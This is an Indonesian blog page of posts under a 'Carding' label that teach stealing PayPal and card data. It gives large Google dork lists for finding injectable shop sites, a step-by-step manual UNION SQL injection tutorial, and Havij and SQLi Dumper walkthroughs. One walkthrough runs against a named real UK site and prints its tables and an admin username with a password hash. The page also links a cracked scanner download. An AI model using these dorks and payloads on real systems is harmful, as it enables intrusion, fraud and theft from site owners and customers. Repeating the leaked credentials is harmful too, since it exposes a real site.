Tampilkan postingan dengan label Carding. Tampilkan semua postingan
Tampilkan postingan dengan label Carding. Tampilkan semua postingan

Selasa, 03 Februari 2015

Tutorial Carding PayPal



Apa Itu Carding Paypal ?
Jelas Yang Namanya Carding Itu Cyber Crime Jadi Ya Intinya Nyolong Punya Orang :v

Oke Fix Mimin Bakal Kasih Cara Carding Paypal buat para MASTAH -/\-

Siapin Bahanya Dulu Mastah -/\-
1. Havij
2. Dork

Langsung Aja Caranya Mastah -/\-



1. Scan Dork nya Dulu 8|


2. Scan Havij


                                     
3. Klik Tables Terus Klik Get Tables


4. Klik Get Columns


5. Klik Get Data Sampai Status : I'm IDLE


6. Klik Save Data > Save Dengan Extensi html


                                      


7. Lansung Masukin Ke Checker Mastah -/\-


                                     

8. Selesai !! 


NB : Kembangkan Sendiri Dork!
Read more

Sabtu, 31 Januari 2015

Download Acunetix Web Vulnerability Scanner 9 Full with Crack

Disini saya menyediakan berbagai Link yang bisa dipilih salah satu untuk memudahkan sobat mendownload file yang dibutuhkan. Jika ada yang belum mengerti cara mendownload file pada link tersebut, sobat bisa lihat Cara dan seandainya ada Link yang rusak atau tidak bisa digunakan.

 

Link Download



Tusfiles :
 s

FileFactory: 
 h

Share Beast:
 g

Share Cash:
 f

Mediafire:
 y

Sumber : http://download.sana-sini.com/2014/02/download-acunetix-web-vulnerability.html
Read more

Cara Mengembangkan Dork

Trick Carding

Dork - Merupakan sebuah teknik dan sekaligus trick yang di gunakan dalam mencari website yang rentan terhadap eror dan yang paling sangat di cari adalah eror yang bertuliskan seperti dibawah ini.

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

Mungkin masih banyak celah selain pesan eror seperti di atas untuk meretas sebuah website secara mudah, Dork ini bisa di ibaratkan adalah sebuah karya seni yang berharga nilainya karena untuk membuat dork butuh pengalaman yang cukup karena untuk membuatnya tidaklah mudah seperti kita membalikan kedua telapak tangan secara bersamaan.
Banyak sekali yang menyebarkan dork google tetapi tidak tahu apa itu yang di maksud dengan dork tersebut, mereka hanya menyebarkan informasi yang mereka dapat dengan cara mengcopy paste tanpa tujuan yang jelas untuk apa dia memberikan dork tersebut.

Tipe dork yang saya sering gunakan dalam mengembangkan dork di google search engine :

  • Inurl        : merupakan website yang kita tuju, yang dimaksud dengan inurl ini mungkin adalah ( ' ) ini merupakan sebuah trick untuk melihat apakah website vuln atau tidak.
  • Intext      : kata - kata yang kita tujukan, ini dapat mencakup semua hal yang kita ketahui, misalkan.
  • Site         : Alamat negara yang kita tuju, dalam hal mengembangkan dork yang paling seting di gunakan adalah negara UK yaitu, Site:"UK"
    Kalian bisa mengganti Uk menjadi domain semua negara sesuai hati dan kebutuhan.
  • .php?xx= : Akhir dari sebuah inurl atau alamat website yang kita tuju.
1. Mengembangkan inurl
2. Mengembangkan intext
3. Mengembangkan Site
4. Mengembangkan .php?xxx=
1. Contoh inurl:"detail"
    Kalian bisa mengganti dengan kata kata yang lainnya seperti :

    1.payment
    2.detail
    3.author
    4.content
       2. Contoh intext:"paypal" [ kata yang sering di gunakan untuk melakukan carding pp ]
          Kalian bisa mengganti dengan kata kata yang lainnya seperti :

        1.Master Card
        2.Visa
        3.payza
        intext tidak selalu terpaku kepada sebuah kartu credit seperti pp/cc,Perlu di ingat untuk dork, kalian tidak harus menggunakan semuanya dalam pencarian di google
        Seperti inurl:"content".php?id=" intext:"paypal" Site:"UK"      
        [ Biasanya kalau kita tambahkan Site tetapi sudah ada intext tidak akan ada website yang tersedia ]
        Jadi kalian bisa menghilangkan salah satu antara intext maupun site. 

          3. Contoh Site:"il"
              Kalian bisa mengganti dengan kata kata yang lainnya seperti :

          1.   UK
          2.   US
          3.   SG
          4.   MY
          5.   KR
          4. Contoh .php?id="
              Kalian bisa mengganti dengan kata kata yang lainnya seperti :

            1.   .php?cat="
            2.   .php?carID="
            3.   .php?category="
            4.   .php?id="
             SEBAIK - BAIKNYA ILMU YANG KITA DAPATKAN ADALAH ILMU YANG DAPAT BERMANFAAT UNTUK SEMUA ORANG DAN JANGAN PERNAH SEKALI - SEKALI KALIAN MEMPERJUAL BELIKAN SEBUAH ILMU, KARENA UANG TIDAK AKAN BERLAKU PADA SAAT KITA DIDALAM ALAM KUBUR !
            SUMBER : http://www.kumachan-xm2.com/2014/07/cara-mengembangkan-dork-di-search-engine.html
            Read more

            Tutorial Menggunakan SQLDumper

            Tutorial sql injection dengan Simple SQLi Dumper v5.1 .......

            persiapan alat perang :

            1.rokok
            2.cemilan
            3.bir
            4.cwek untuk nambah semangat nginject :D

            Langkah-Langkah Yang Mesti Benar2 Di Perhatikan 

            1.perl kalau di linux udh ada :D ..nah gmn kalau di windows download di sini "http://www.perl.org/get.html"
            2.sqli dumper v.51 ... download di sini "http://www.ziddu.com/download/10540105/ssdp51.tar.gz.html "
            trus extrack yang windows extrack di drive C kl linux taruh di folder my documentnya linux .... Pfft

            ok udh siapkan sekarang mulai .......

            target : http://www.beautycall.co.uk/gallery.php?id=1
            dork :inurl:/gallery.php?id=

            nah buka jendela terminal for linux ..dan .cmd for windows

            step 1 "Find Magic Number / Null Column "-magic"
            Command: perl ssdp.pl -u [URL] -magic

            example"ketikkan perintah ini
            perl ssdp.pl -u http://www.beautycall.co.uk/gallery.php?id=1 -magic


            dan ini hasilnya .....
            --------------------------------------------------------------------------------------------
            jimmyromanticdevil@jimmyromanticdevil-laptop:~$ perl ssdp.pl -u http://www.beautycall.co.uk/gallery.php?id=1 -magic


            [o]=================================================[x]
            | Simple SQLi Dumper v5.1 |
            | Coded by Vrs-hCk |
            [o]=================================================[o]
            Date : Sat Jul 3 14:22:10 2010
            Help Command: -h, -help, --help

            [+] URL: http://www.beautycall.co.uk/gallery.php?id=1
            [+] End Tag: --

            Attempting to find the magic number...

            [+] Testing: 1,2,3,

            [+] Field Length : 3
            [+] Magic Number : 2,3,
            [+] URL Injection: http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3

            Showing MySQL Information ...

            [+] Database: beautycall_co_uk_web
            [+] User: pmowat@localhost
            [+] Version: 5.0.67
            [+] System: redhat-linux-gnu
            [+] Access to "mysql" Database: No
            [+] Read File "/etc/passwd": No

            Done.

            ---------------------------------------------------------------------------------------
            step 2
            find the table
            Concat Tables

            Command: perl ssdp.pl -u [SQLi URL] -table

            contoh ketikkan perintah ini :
            perl ssdp.pl -u http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3 -table

            ini hasilnya :

            jimmyromanticdevil@jimmyromanticdevil-laptop:~$ perl ssdp.pl -u http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3 -table


            [o]=================================================[x]
            | Simple SQLi Dumper v5.1 |
            | Coded by Vrs-hCk |
            [o]=================================================[o]
            Date : Sat Jul 3 14:24:59 2010
            Help Command: -h, -help, --help

            [+] c0li SQLi URL: http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3
            [+] SQLi End Tag: --
            [+] Database Name: database()
            [+] Number of Tables: 40

            Showing tables ...

            [1] CITY(6)
            [2] COUNTRY(32)
            [3] admin(1)
            [4] aplicationform(31)
            [5] appointment(898)
            [6] appointment_event(8)
            [7] artist(96)
            [8] artist_text_image(1)
            [9] city(6)
            [10] contact(1)
            [11] efranchisee(122)
            [12] files(2)
            [13] files2(33)
            [14] files3(0)
            [15] folders(2)
            [16] form(158)
            [17] franchise(9)
            [18] franchiseefolders(8)
            [19] galery(20)
            [20] homepage(1)
            [21] links(26)
            [22] links_cat(12)
            [23] log(0)
            [24] midlands(10)
            [25] north(6)
            [26] package_image(1)
            [27] packages(5)
            [28] postcode(122)
            [29] regions(8)
            [30] register(4)
            [31] services(6)
            [32] shortform(36)
            [33] southeast(14)
            [34] southwest(6)
            [35] states(11)
            [36] subfolders(14)
            [37] ukmap(125)
            [38] ukpostcodes(104)
            [39] vouchers(1)
            [40] wales(2)

            Done.

            --------------------------------------------------------------------------------
            nah udh di dapatkan tablenya :D
            nah lihat tuh table admin :D
            sekarang kita ingin isi colomn admin tersebut .......

            step 3
            mencari colomn admin
            Concat Columns
            Required Options: -u, -t

            Command: perl ssdp.pl -u [SQLi URL] -d [dbname] -t [tblname] -column
            contoh ketikan command ini
            perl ssdp.pl -u http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3 -t admin -column

            hasilna seperti ini
            ---------------------------------------------------------------------------------------
            jimmyromanticdevil@jimmyromanticdevil-laptop:~$ perl ssdp.pl -u http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3 -t admin -column

            [o]=================================================[x]
            | Simple SQLi Dumper v5.1 |
            | Coded by Vrs-hCk |
            [o]=================================================[o]
            Date : Sat Jul 3 14:38:30 2010
            Help Command: -h, -help, --help

            [+] c0li SQLi URL: http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3
            [+] SQLi End Tag: --
            [+] Database Name: database()
            [+] Table Name: admin
            [+] Number of Columns: 4

            Showing columns from table "admin" ...

            [+] admin(1): id,username,password,email

            Done.

            ------------------------------------------------------------------------------------

            nah itu ada isi colom admin id, username,password dan email ....wah keren yah ini tools Pfft
            nah sekarang apa lagi ..


            step end

            dumping data

            now we'll see information inside that column.. Smile

            command # perl ssdp.pl -u [c0li URL] -t [table] -c [column],[column] -dump

            contoh ketikkan perintah ini "
            perl ssdp.pl -u http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3 -t admin -c username,password -dump



            hasilna
            -------------------------------------------------------------------------------------
            jimmyromanticdevil@jimmyromanticdevil-laptop:~$ perl ssdp.pl -u http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3 -t admin -c username,password -dump


            [o]=================================================[x]
            | Simple SQLi Dumper v5.1 |
            | Coded by Vrs-hCk |
            [o]=================================================[o]
            Date : Sat Jul 3 14:43:37 2010
            Help Command: -h, -help, --help

            [+] c0li SQLi URL: http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3
            [+] SQLi End Tag: --

            [+] Database Name: database()
            [+] Table Name: admin
            [+] Column Name: username,password
            [+] Data Count: 1

            Dumping Data ...

            [1] beautycall2010 : d68553e40237bde1465a1da5b199c072

            Done.

            -----------------------------------------------------------------------------

            akhirnya di dapatkan username dan password admin ...

            username : beautycall2010
            pass: d68553e40237bde1465a1da5b199c072


            seee it simple ..and easy ....silahkan di coba ....

            Sumver
            Read more

            Tutorial menggunakan SQL Injection

            Pengertian sql injection:
            SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

            Yang perlu di ketahui sebelum sql injection pada mysql:
            karakter: ' atau -
            comments: /* atau --
            information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

            ===========
            =step Satu:=
            ===========

            carilah target
            misal: [site]/berita.php?id=100

            Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
            contoh:
            [site]/berita.php?id=100' atau
            [site]/berita.php?id=-100
            ehingga muncul pesan error seperti berikut (masih bnyak lagi):


            ==========
            =step Dua:=
            ==========

            mencari dan menghitung jumlah table yang ada dalam databasenya...
            gunakan perintah : order by

            contoh:


            [site]/berita.php?id=-100+order+by+1-- atau
            [site]/berita.php?id=-100+order+by+1/*

            ceklah secara step by step (satupersatu)...
            misal:


            [site]/berita.php?id=-100+order+by+1--
            [site]/berita.php?id=-100+order+by+2--
            [site]/berita.php?id=-100+order+by+3--
            [site]/berita.php?id=-100+order+by+4--

            sehingga muncul error atau hilang pesan error...
            misal: [site]/berita.php?id=-100+order+by+9--

            berarti yang kita ambil adalah sampai angka 8
            menjadi [site]/berita.php?id=-100+order+by+8--


            ===========
            =step Tiga:=
            ===========

            untuk mengeluarkan angka berapa yang muncul gunakan perintah union
            karena tadi error sampai angka 9
            maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

            ok seumpama yg keluar angka 5

            gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
            misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
            [site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

            lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

            untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..


            ============
            =step Empat:=
            ============

            untuk menampilkan table yg ada pada web tsb adalah
            perintah table_name >>> dimasukan pada angka yg keluar tadi
            perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

            Code:

            [site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--

            seumpama table yang muncul adalah "admin"


            ===========
            =step Lima:=
            ===========

            untuk menampilkan semua isi dari table tsb adalah
            perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
            perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir



            [site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema. ​tables+where+table_schema=database()--

            =============
            = step Enam: =
            =============

            perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
            perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir



            [site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema ​.columns+where+table_name=0xhexa--

            pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
            website yg digunakan untuk konversi :

            http://www.v3n0m.net/ascii.htm

            contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E



            [site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema ​.columns+where+table_name=0x61646D696E--

            ============
            =step Tujuh:=
            ============

            memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

            perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
            perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

            Contoh :

            [site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--

            contoh kata yang keluar adalah id,username,password

            Contoh :

            [site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--

            ==============
            = step Delapan:=
            ==============

            tahap terakhir mencari halam admin atau login .


            Silahkan DI pelajari Kaka ..

            SUmber
            Read more

            Tutorial Lengkap Carding Dengan Havij

             

            Haloo. sobat.. kali ini saya akan share tutorial carding dengan havij.. Pertama yang harus anda lakukan tentunya harus punya havij, jika belum punya DOWNLOAD

            Cari duly dork, karena kita akan menggunakan teknik SQL Injection Vulnerability.
            Dork :
            nurl:".php?cat="+intext:"Paypal"+site:UK
            inurl:".php?cat="+intext:"/Buy Now/"+site:.net
            inurl:".php?cid="+intext:"online+betting"


            inurl:".php?id=" intext:"View cart"
            inurl:".php?id=" intext:"Buy Now"
            inurl:".php?id=" intext:"add to cart"
            inurl:".php?id=" intext:"shopping"
            inurl:".php?id=" intext:"boutique"
            inurl:".php?id=" intext:"/store/"
            inurl:".php?id=" intext:"/shop/"
            inurl:".php?id=" intext:"toys"

            inurl:".php?cid="
            inurl:".php?cid=" intext:"shopping"
            inurl:".php?cid=" intext:"add to cart"
            inurl:".php?cid=" intext:"Buy Now"
            inurl:".php?cid=" intext:"View cart"
            inurl:".php?cid=" intext:"boutique"
            inurl:".php?cid=" intext:"/store/"
            inurl:".php?cid=" intext:"/shop/"
            inurl:".php?cid=" intext:"Toys"

            inurl:".php?cat="
            inurl:".php?cat=" intext:"shopping"
            inurl:".php?cat=" intext:"add to cart"
            inurl:".php?cat=" intext:"Buy Now"
            inurl:".php?cat=" intext:"View cart"
            inurl:".php?cat=" intext:"boutique"
            inurl:".php?cat=" intext:"/store/"
            inurl:".php?cat=" intext:"/shop/"
            inurl:".php?cat=" intext:"Toys"

            inurl:".php?catid="
            inurl:".php?catid=" intext:"View cart"
            inurl:".php?catid=" intext:"Buy Now"
            inurl:".php?catid=" intext:"add to cart"
            inurl:".php?catid=" intext:"shopping"
            inurl:".php?catid=" intext:"boutique"
            inurl:".php?catid=" intext:"/store/"
            inurl:".php?catid=" intext:"/shop/"
            inurl:".php?catid=" intext:"Toys"

            inurl:".php?categoryid="
            inurl:".php?categoryid=" intext:"View cart"
            inurl:".php?categoryid=" intext:"Buy Now"
            inurl:".php?categoryid=" intext:"add to cart"
            inurl:".php?categoryid=" intext:"shopping"
            inurl:".php?categoryid=" intext:"boutique"
            inurl:".php?categoryid=" intext:"/store/"
            inurl:".php?categoryid=" intext:"/shop/"
            inurl:".php?categoryid=" intext:"Toys"

            inurl:".php?pid="
            inurl:".php?pid=" intext:"shopping"
            inurl:".php?pid=" intext:"add to cart"
            inurl:".php?pid=" intext:"Buy Now"
            inurl:".php?pid=" intext:"View cart"
            inurl:".php?pid=" intext:"boutique"
            inurl:".php?pid=" intext:"/store/"
            inurl:".php?pid=" intext:"/shop/"
            inurl:".php?pid=" intext:"toys"

            inurl:".php?prodid=
            inurl:".php?prodid=" intext:"shopping"
            inurl:".php?prodid=" intext:"add to cart"
            inurl:".php?prodid=" intext:"Buy Now"
            inurl:".php?prodid=" intext:"View cart"
            inurl:".php?prodid=" intext:"boutique"
            inurl:".php?prodid=" intext:"/store/"
            inurl:".php?prodid=" intext:"/shop/"
            inurl:".php?prodid=" intext:"toys"

            inurl:".php?productid='
            inurl:".php?productid=" intext:"shopping"
            inurl:".php?productid=" intext:"add to cart"
            inurl:".php?productid=" intext:"Buy Now"
            inurl:".php?productid=" intext:"View cart"
            inurl:".php?productid=" intext:"boutique"
            inurl:".php?productid=" intext:"/store/"
            inurl:".php?productid=" intext:"/shop/"
            inurl:".php?productid=" intext:"Toys"

            inurl:".php?product="
            inurl:".php?product=" intext:"shopping"
            inurl:".php?product=" intext:"add to cart"
            inurl:".php?product=" intext:"Buy Now"
            inurl:".php?product=" intext:"View cart"
            inurl:".php?product=" intext:"boutique"
            inurl:".php?product=" intext:"/store/"
            inurl:".php?product=" intext:"/shop/"
            inurl:".php?product=" intext:"toys"
            inurl:".php?product=" intext:"DVD"

            inurl:".php?products="
            inurl:".php?products=" intext:"shopping"
            inurl:".php?products=" intext:"add to cart"
            inurl:".php?products=" intext:"Buy Now"
            inurl:".php?products=" intext:"View cart"
            inurl:".php?products=" intext:"boutique"
            inurl:".php?products=" intext:"/store/"
            inurl:".php?products=" intext:"/shop/"
            inurl:".php?products=" intext:"toys"
            inurl:".php?products=" intext:"DVD"

            inurl:".php?proid="
            inurl:".php?proid=" intext:"shopping"
            inurl:".php?proid=" intext:"add to cart"
            inurl:".php?proid=" intext:"Buy Now"
            inurl:".php?proid=" intext:"View cart"
            inurl:".php?proid=" intext:"boutique"
            inurl:".php?proid=" intext:"/store/"
            inurl:".php?proid=" intext:"/shop/"
            inurl:".php?proid=" intext:"toys"

            inurl:".php?shopid="
            inurl:".php?shopid=" intext:"shopping"
            inurl:".php?shopid=" intext:"add to cart"
            inurl:".php?shopid=" intext:"Buy Now"
            inurl:".php?shopid=" intext:"View cart"
            inurl:".php?shopid=" intext:"boutique"
            inurl:".php?shopid=" intext:"/store/"
            inurl:".php?shopid=" intext:"/shop/"
            inurl:".php?shopid=" intext:"Toys"

            inurl:".php?itemid="
            inurl:".php?itemid=" intext:"shopping"
            inurl:".php?itemid=" intext:"add to cart"
            inurl:".php?itemid=" intext:"Buy Now"
            inurl:".php?itemid=" intext:"View cart"
            inurl:".php?itemid=" intext:"boutique"
            inurl:".php?itemid=" intext:"/shop/"
            inurl:".php?itemid=" intext:"/store/"
            inurl:".php?itemid=" intext:"Toys"

            inurl:".php?orderid="
            inurl:".php?orderid=" intext:"shopping"
            inurl:".php?orderid=" intext:"add to cart"
            inurl:".php?orderid=" intext:"Buy Now"
            inurl:".php?orderid=" intext:"View cart"
            inurl:".php?orderid=" intext:"boutique"
            inurl:".php?orderid=" intext:"/shop/"
            inurl:".php?orderid=" intext:"/store/"
            inurl:".php?orderid=" intext:"Toys"


            inurl:".php?catalogId="
            inurl:".php?catalogId=" intext:"shopping"
            inurl:".php?catalogId=" intext:"add to cart"
            inurl:".php?catalogId=" intext:"Buy Now"
            inurl:".php?catalogId=" intext:"View cart"
            inurl:".php?catalogId=" intext:"boutique"
            inurl:".php?catalogId=" intext:"/shop/"
            inurl:".php?catalogId=" intext:"/store/"
            inurl:".php?catalogId=" intext:"Toys"

            inurl:".php?aid="
            inurl:".php?aid=" intext:"shopping"
            inurl:".php?aid=" intext:"add to cart"
            inurl:".php?aid=" intext:"Buy Now"
            inurl:".php?aid=" intext:"View cart"
            inurl:".php?aid=" intext:"boutique"
            inurl:".php?aid=" intext:"/shop/"
            inurl:".php?aid=" intext:"/store/"
            inurl:".php?aid=" intext:"toys"

            inurl:".php?artid="
            inurl:".php?artid=" intext:"shopping"
            inurl:".php?artid=" intext:"add to cart"
            inurl:".php?artid=" intext:"Buy Now"
            inurl:".php?artid=" intext:"View cart"
            inurl:".php?artid=" intext:"boutique"
            inurl:".php?artid=" intext:"/shop/"
            inurl:".php?artid=" intext:"/store/"
            inurl:".php?artid=" intext:"toys"


            inurl:".php?articleid="
            inurl:".php?articleid=" intext:"shopping"
            inurl:".php?articleid=" intext:"add to cart"
            inurl:".php?articleid=" intext:"Buy Now"
            inurl:".php?articleid=" intext:"View cart"
            inurl:".php?articleid=" intext:"boutique"
            inurl:".php?articleid=" intext:"/shop/"
            inurl:".php?articleid=" intext:"/store/"
            inurl:".php?articleid=" intext:"toys"

            Pilih salah satu dork diatas, kemudian copy dan paste'kan ke kolom google lalu search.. lalu akan muncul banyak site injectnya 


            Lalu buka satu persatu dan sisipkan tanda ' di akhir URL sampai menemukan syntax eror




            Setelah mendapatkan site yang akan menjadi target langsung hajar saja menggunakan havij,Paste url site tersebut ke kolom target di HAVIJ dan tekan Analyze





            setelah dapat klik get table dan setelah itu get columns and then get data finish, anda telah berhasil mendapatkan database website tersebut seperti email dan password member bahkan admin dari website tersebut etelah itu lihat data found fassword =505be7e39328a96ocfe6 bla..bla..bla.itu merupakan hash md5 yang belum di crack,untuk menjadi sebuah fassword anda terlebih dahulu mengcrak fpassowrd di web yang berada dikotak hitam ini.

            Read more